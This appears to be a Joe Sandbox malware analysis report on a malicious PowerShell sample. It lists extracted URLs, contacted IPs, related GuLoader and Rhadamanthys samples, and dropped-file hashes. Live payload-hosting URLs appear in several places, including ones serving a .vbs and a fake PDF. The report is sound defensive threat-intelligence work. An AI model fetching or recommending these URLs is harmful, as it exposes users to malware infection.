                  		high
                  http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.11.drfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000005.00000002.1512088462.0000028A4F532000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED926A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED9E56000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.microsoftApowershell.exe, 00000005.00000002.1502142325.0000028A4C845000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.microsoft.copowershell.exe, 00000005.00000002.1511872796.0000028A4E790000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000008.00000002.1330629273.0000021ED9E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.ver)svchost.exe, 0000000C.00000002.2518391003.00000250DD08D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://go.microspowershell.exe, 00000008.00000002.1330629273.0000021ED926A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.astenterprises.com.pkpowershell.exe, 00000005.00000002.1512088462.0000028A503FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.adobe.coReaderMessages.10.drfalse
                                                		high
                                                http://astenterprises.com.pkpowershell.exe, 00000005.00000002.1512088462.0000028A503FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.astenterprises.com.pkpowershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.ppowershell.exe, 00000005.00000002.1512088462.0000028A4FF32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.live.com/odclientsettings/Prod-C:edb.log.12.drfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.bluemaxxlaser.compowershell.exe, 00000005.00000002.1512088462.0000028A50491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1512088462.0000028A50435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contoso.com/powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 0000000C.00000003.1423876547.00000250DCE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1578438045.0000028A5EAB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1578438045.0000028A5E975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://aka.ms/pscore68powershell.exe, 00000005.00000002.1512088462.0000028A4E901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED8831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1512088462.0000028A4E901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED8831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.blud1dmaxxlasd1dr.com/ms/ms.vbspowershell.exe, 00000005.00000002.1512088462.0000028A4EB32000.00000004.00000800.00020000.00000000.sdmp, 8iAcoQLc3o.ps1true
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  203.175.174.69
                                                                  		www.bluemaxxlaser.comSingapore
                                                                  		24482SGGS-AS-APSGGSSGfalse
                                                                  107.161.23.150
                                                                  		astenterprises.com.pkUnited States
                                                                  		3842RAMNODEUSfalse

                                                                  Private

                                                                  IP
                                                                  127.0.0.1

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1578224
                                                                  Start date and time:2024-12-19 12:44:08 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 29s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:22
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:8iAcoQLc3o.ps1
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935.ps1
                                                                  Detection:MAL
                                                                  Classification:mal84.evad.winPS1@21/61@3/3
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 83%
                                                                  • Number of executed functions: 5
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .ps1

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 23.218.208.109, 23.32.238.74, 23.32.238.18, 52.6.155.20, 52.22.41.97, 3.233.129.217, 3.219.243.226, 23.195.61.56, 2.19.198.27, 23.32.239.9, 23.32.239.56, 184.30.20.134, 23.32.239.65, 23.54.80.26, 23.54.80.57, 13.107.246.63, 172.202.163.200, 18.213.11.84
                                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7804 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 8072 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  06:45:02API Interceptor67x Sleep call for process: powershell.exe modified
                                                                  06:45:14API Interceptor2x Sleep call for process: svchost.exe modified
                                                                  06:45:25API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  203.175.174.69fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                  ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  64Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • bluemaxxlaser.com/rh/rheu.bin
                                                                  zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • bluemaxxlaser.com/rh/rh.bin
                                                                  eua.ps1Get hashmaliciousGuLoaderBrowse
                                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                  zp.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                  zk.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                  107.161.23.150tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                    FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                        0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                            List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                    xw0K5Lahxz.exeGet hashmaliciousUnknownBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      www.bluemaxxlaser.comfs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      eua.ps1Get hashmaliciousGuLoaderBrowse
                                                                                      • 203.175.174.69
                                                                                      zp.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      zk.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      mx.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      as.ps1Get hashmaliciousGuLoaderBrowse
                                                                                      • 203.175.174.69
                                                                                      bg.microsoft.map.fastly.netLFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                      • 199.232.210.172
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.214.172
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.214.172
                                                                                      T.T_Copy.12.18.2024.exeGet hashmaliciousArrowRATBrowse
                                                                                      • 199.232.214.172
                                                                                      22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                      • 199.232.214.172
                                                                                      Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                                                      • 199.232.214.172

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      RAMNODEUS2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                      • 107.161.23.150
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      SGGS-AS-APSGGSSGfs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                      • 103.14.247.60
                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                      • 103.14.247.29
                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                      • 103.14.247.60
                                                                                      jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 103.14.247.64
                                                                                      IGvLaRmr0J.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 103.14.247.58

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0eR7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150
                                                                                      v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150
                                                                                      HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150
                                                                                      hKvlV6A1Rl.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150
                                                                                      kqeGVKtpy2.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.8807679433693703
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9j:0J7adfWuK0p/QDfKoPeuP0aN4fqox4
                                                                                      MD5:72BDC4F10EB75ED9B8E7FFDD4481CE92
                                                                                      SHA1:EF33B8A4BA51CA664824D9B4B678C2013E4FC809
                                                                                      SHA-256:3CE482307887B8B26D3E0D67FF12FA1444087D938B30B092B79602EA963946E2
                                                                                      SHA-512:833BF1AD2819278E23F185547B830F78812D4ADE65C056853D171C880CEB90C44C5A32C9189D75DDCDF7810E0D60AA18626A9EA86996C6DEAD1173F40FA39AE3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x592567a6, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.7880724357943935
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:vSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:vazaPv4V4fXq2UaB
                                                                                      MD5:53907F3500756B4908D56ED262DA9700
                                                                                      SHA1:0DA030C34B90F8526A613ABA1B9A2DCFDA6E7221
                                                                                      SHA-256:D2FBDFE3A8E0752E4C4C232BBDB42D7FB66392AC5F1300822AC5694B961EC0E4
                                                                                      SHA-512:D11430E8DD077C29F0CF5CA76283170E26C874083B25928B3AD99E489D6CAC9AE89618168ED50E359DC31900641FFF14DACA22CDF322841EFCF0ED8FB8366F6C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Y%g.... ...............X\...;...{......................X............{...-...|9.h...........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......12...{...............................................................................................................................................................................................2...{...................................q$X.-...|w>................g....-...|w..........................#......h.......................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16384
                                                                                      Entropy (8bit):0.08158434391047377
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:V7mlXKYecCsr29mXlVG0+q2Iqe8lHer/l/allNTt/4ll/Q6beV/:pyKzeYUGE8lHejIHtc6V
                                                                                      MD5:40822A7B3567EB0BF06A718B79CCBAEA
                                                                                      SHA1:2D5DE8425214A6380F4120A0B97C6B1E047E2145
                                                                                      SHA-256:EF318D54B56F51300972CD2C1BC773F1A5F617BA6A537A1CF4D7CEB74075CBC4
                                                                                      SHA-512:019145FBE18941112C010030803DCE826FE5627B4A466AB0F28D8C5689B1259FB0E5B85BD197274FC97E3F047CF61095B25849EA52C2EBC5B521249F2560BD42
                                                                                      Malicious:false
                                                                                      Preview:Y!.r.....................................;...{...-...|w......{...............{.......{....:......{.................g....-...|w.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.279471017439473
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7nwQ+q2PFi2nKuAl9OmbnIFUt8OHdSgZmw+OHdSQVkwOFi2nKuAl9OmbjLJ:7wVvdZHAahFUt8OHQg/+OHQI5wZHAaSJ
                                                                                      MD5:1FAE92DF1050DE924A18277FA37C2EFE
                                                                                      SHA1:C920C971EEA15377BB3B649F780F13B73678E7CA
                                                                                      SHA-256:43983504FB57968C4D3CA3E150329BE81F2FEA9D4EAC2685CAF99F7F4A4A807D
                                                                                      SHA-512:DDE950AF2DC1589F46AA4CDD08187189C87938D22C5B4431A56F75CF96575BD3B62B3DDB1BF8BC984678CF6FA00100E6D99FC91D652D5243A22E00D548AA80F3
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:45:14.622 468 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:45:14.657 468 Recovering log #3.2024/12/19-06:45:14.657 468 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.279471017439473
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7nwQ+q2PFi2nKuAl9OmbnIFUt8OHdSgZmw+OHdSQVkwOFi2nKuAl9OmbjLJ:7wVvdZHAahFUt8OHQg/+OHQI5wZHAaSJ
                                                                                      MD5:1FAE92DF1050DE924A18277FA37C2EFE
                                                                                      SHA1:C920C971EEA15377BB3B649F780F13B73678E7CA
                                                                                      SHA-256:43983504FB57968C4D3CA3E150329BE81F2FEA9D4EAC2685CAF99F7F4A4A807D
                                                                                      SHA-512:DDE950AF2DC1589F46AA4CDD08187189C87938D22C5B4431A56F75CF96575BD3B62B3DDB1BF8BC984678CF6FA00100E6D99FC91D652D5243A22E00D548AA80F3
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:45:14.622 468 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:45:14.657 468 Recovering log #3.2024/12/19-06:45:14.657 468 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):334
                                                                                      Entropy (8bit):5.2121731740618165
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7JOq2PFi2nKuAl9Ombzo2jMGIFUt8OXmZmw+OTkwOFi2nKuAl9Ombzo2jMmLJ:7kvdZHAa8uFUt8OW/+OT5wZHAa8RJ
                                                                                      MD5:90FA7ED9DB4458BEE3A642C4698C96C8
                                                                                      SHA1:FC22B2438027C82D319B986B7AC735DFDFE9A7B4
                                                                                      SHA-256:B11DC7F0578891A7B314C7F8B9CAA1876B35563459D68E9E9E503DFB6D94DDBD
                                                                                      SHA-512:DA44501C6AE4EEA5AA18218A208A8C2A7B4446DA7CACE70C2AFC3CAF724980C7B0B0256C73D8A7A3E33C074369A51A50BCE964965E7921259F98745541379FC4
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:45:14.613 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:45:14.616 1fc4 Recovering log #3.2024/12/19-06:45:14.617 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):334
                                                                                      Entropy (8bit):5.2121731740618165
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7JOq2PFi2nKuAl9Ombzo2jMGIFUt8OXmZmw+OTkwOFi2nKuAl9Ombzo2jMmLJ:7kvdZHAa8uFUt8OW/+OT5wZHAa8RJ
                                                                                      MD5:90FA7ED9DB4458BEE3A642C4698C96C8
                                                                                      SHA1:FC22B2438027C82D319B986B7AC735DFDFE9A7B4
                                                                                      SHA-256:B11DC7F0578891A7B314C7F8B9CAA1876B35563459D68E9E9E503DFB6D94DDBD
                                                                                      SHA-512:DA44501C6AE4EEA5AA18218A208A8C2A7B4446DA7CACE70C2AFC3CAF724980C7B0B0256C73D8A7A3E33C074369A51A50BCE964965E7921259F98745541379FC4
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:45:14.613 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:45:14.616 1fc4 Recovering log #3.2024/12/19-06:45:14.617 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\38cd6055-2d78-4ab1-8a18-2971a31a3f39.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:modified
                                                                                      Size (bytes):476
                                                                                      Entropy (8bit):4.977306316743135
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqpsBdOg2HYAcaq3QYiubpP7E4TX:Y2sRdsLdMHYr3QYhbd7n7
                                                                                      MD5:1E8E38C259778BB5F94CDD4A72BB9197
                                                                                      SHA1:CA0BCCD25BBC0D2A0AA37F506A2D921ACD002AC1
                                                                                      SHA-256:988D8E01915D5080947E3CC95757D521E9CCE5DE90ABB170D79FB9F0D151503B
                                                                                      SHA-512:1632886031BAE48A6B1397368FF9C73A4AE067CED66A7E93984E49E38E3FC65D483E1A9E9428F0C04E77E29A85DFE5EBAD1D1BC3D9DB3A6FFA047137DDEF6C5E
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168723299245","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":612567},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\64a02cfb-802d-4d34-b4f5-cd28b5fe856a.tmp

                                                                                      Download File
